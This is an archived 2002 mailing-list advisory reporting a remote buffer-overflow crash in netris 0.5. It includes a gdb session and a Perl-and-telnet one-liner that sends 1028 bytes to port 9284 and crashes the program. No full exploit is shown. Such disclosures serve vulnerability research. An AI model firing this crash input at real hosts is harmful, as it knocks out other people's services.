|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Artur Byszko / bajkero (bajkero_at_security.hack.pl)
Date: Sun Sep 08 2002 - 23:55:38 CDT
hi.
i found remote bug in latest version of netris(0.5)..
(apocalypse:~)% gdb netris
GNU gdb 4.18 (FreeBSD)
[..]
(gdb) r -w
Starting program: /usr/local/bin/netris -w
(no debugging symbols found)...(no debugging symbols found)...
***
on second terminal:
(apocalypse:~)% perl -e '{print "a"x"1028"}' | telnet localhost 9284
***
Your opponent is using an old, incompatible version
of Netris. They should get the latest version.
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28138fd5 in getenv () from /usr/lib/libc.so.4
exploit code is still under developing.. ;)
sorry for my terrible english.
best regards,
-- * Artur Byszko * \x62\x61\x6a\x6b\x65\x72\x6f *
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD)
iD8DBQE9fCnKQCQI8Fcqp4cRApvQAJ9T1Gmcbxw5x3YEIxSZ5sgC5dwXGQCgh1fH LXwaDWRPOQ/boJ6WDkYtNJM= =bTns -----END PGP SIGNATURE-----
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]